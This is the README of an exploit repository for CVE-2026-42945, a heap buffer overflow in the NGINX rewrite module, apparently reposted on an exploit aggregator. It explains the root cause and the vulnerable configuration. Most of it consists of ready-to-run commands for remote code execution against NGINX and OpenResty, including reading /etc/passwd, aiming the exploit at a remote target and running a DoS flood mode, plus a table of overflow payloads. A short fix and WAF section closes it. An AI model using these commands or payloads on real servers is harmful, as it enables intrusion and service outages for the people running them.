Share
## https://sploitus.com/exploit?id=249FFDA3-A061-5AA5-90A9-00C4EA088C4C
# CVE-2026-42945 โ NGINX Rewrite Module Heap Buffer Overflow โ RCE
> **RCE successfully exploited** โ Arbitrary commands can be executed in the NGINX/OpenResty worker process through a heap overflow attack + GDB process injection.
## Quick start
```bash
# Build the NGINX image with one click + perform RCE testing
./run.sh nginx
# Build the OpenResty image with one click + perform RCE testing
./run.sh openresty
# Custom commands
./run.sh nginx 'cat /etc/passwd'
./run.sh openresty 'whoami'
```
## Vulnerability overview
| Attribute | Value |
|-----------|--------|
| CVE ID | CVE-2026-42945 |
| Vulnerability type | Heap buffer overflow โ Remote code execution (RCE) |
| Affected component | `ngx_http_rewrite_module` |
| Affected versions | NGINX 0.6.27 ~ 1.30.1, NGINX Plus R32 ~ R36 |
| Vulnerability score | CVSS 9.4 (CRITICAL) |
| Exploitation conditions | No authentication required; RCE requires ptrace permission (root) |
## Root cause of the vulnerability
The `ngx_http_script_complex_value_code()` function allocates buffers based on the **decoded length** of URIs. However, the `ngx_http_script_copy_capture_code()` function uses `ngx_escape_uri()`, which writes data based on the **encoded length**. URL-encoded characters are expanded by 3 times โ **heap overflow**.
### Triggering conditions
All three conditions must be met simultaneously:
1. The `rewrite` and `set` directives are in **the same location**.
2. The `rewrite` replacement string contains `?`.
3. The `set` directive references the **capture variable `$1` from the rewrite directive**.
```nginx
location ~ ^/api/(.*)$ {
rewrite ^/api/(.*)$ /internal?migrated=true; # Contains '?'
set $original_endpoint $1; # References $1
}
```
### ASAN stack trace
```
#0 ngx_escape_uri src/core/ngx_string.c:1663
#1 ngx_http_script_copy_capture_code src/http/ngx_http_script.c:1399
#2 ngx_http_rewrite_handler src/http/modules/ngx_http_rewrite_module.c:180
```
## Project structure
```
. โโโ run.sh # One-click build + testing entry
โ โโโ README.md โ
โโโ scripts/ โ # Testing & exploitation scripts
โ โโโ rce.sh โ # Pure Shell-based RCE (curl + GDB, no Python)
โ โโโ exploit_rce.py โ # Python-based RCE (compatible with 2.7/3.x)
โ โโโ exploit.py โ # PoC main script (check/exploit/rce/flood)
โ โโโ exploit_asan.py โ # ASAN comprehensive scan
โ โโโ package/ โ # Deployment & orchestration files
โ โโโ Dockerfile.rce โ # NGINX source code compilation + RCE environment
โ โโโ Dockerfile.openresty.rce โ # OpenResty source code compilation + RCE environment
โ โโโ Dockerfile โ # Base image (Alpine)
โ โโโ Dockerfile.asan โ # ASAN debugging image
โ โโโ docker-compose.yml โ # Docker orchestration (nginx-rce + openresty-rce)
```
โ โโโ nginx.conf # NGINX vulnerability configuration
โ โโโ nginx-openresty.conf # OpenResty vulnerability configuration
โ โโโ start_rce.sh # NGINX RCE container startup script
โ โโโ start_openresty_rce.sh # OpenResty RCE container startup script
โ
โโโ src/ # Source code (for compilation)
โโโ nginx-1.26.3/ # NGINX 1.26.3 source code
โโโ nginx-1.26.3.tar.gz
โโโ openresty-1.25.3.1.tar.gz # OpenResty 1.25.3.1 (with nginx/1.25.3 built-in)
```
## Detailed Usage
### Testing within the Docker container
```bash
# Shell script (no Python dependencies required)
docker exec nginx-rce bash /opt/rce.sh 'id'
docker exec nginx-rce bash /opt/rce.sh 'cat /etc/passwd'
# Python script (compatible with 2.7/3.x)
docker exec nginx-rce python3 /opt/exploit_rce.py -t http://127.0.0.1:80 -c 'whoami'
# Same for OpenResty
docker exec openresty-rce bash /opt/rce.sh 'id'
```
### Entering the container from the host machine
```bash
docker exec -it nginx-rce bash
# Inside the container:
bash /opt/rce.sh 'id'
python3 /opt/exploit_rce.py -t http://127.0.0.1:80 -c 'uname -a'
```
### Testing remote targets directly
```bash
# Requires root and ptrace privileges
sudo python3 scripts/exploit_rce.py -t http://target:80 -c 'id'
```
### Main exploitation script (four modes)
```bash
python3 scripts/exploit.py --target http://localhost:8775 --mode check # Detect vulnerabilities
python3 scripts/exploit.py --target http://localhost:8775 --mode exploit # ASAN heap overflow verification
python3 scripts/exploit.py --target http://localhost:8775 --mode rce # RCE risk assessment
python3 scripts/exploit.py --target http://localhost:8775 --mode flood # DoS stress test
```
## Triggering the payload
| Payload | Description | Result |
|---------|--------------|-------|
| `/api/%25` ร N | Encoded `%` | โ
Heap overflow |
| `/api/%3f` ร N | Encoded `?` | โ
Heap overflow |
| `/api/%23` ร N | Encoded `#` | โ
Heap overflow |
| `/api/%26` ร N | Encoded `&` | โ
Heap overflow |
## Fix suggestions
1. **Upgrade NGINX** to version 1.30.2+
2. **Temporary mitigation**: Avoid using combinations of `rewrite` (including `?`) and `set` (referring to `$1`)
3. **WAF rules**: Intercept requests containing numerous `%25`, `%3f`, `%23`, and `%26` encodings
4. **Permission reinforcement**: Use `echo 1 > /proc/sys/kernel/yama/ptrace_scope`
## References
- [F5 Advisory K000161019](https://my.f5.com/manage/s/article/K000161019)
- [NGINX Source Code](https://nginx.org/en/download.html)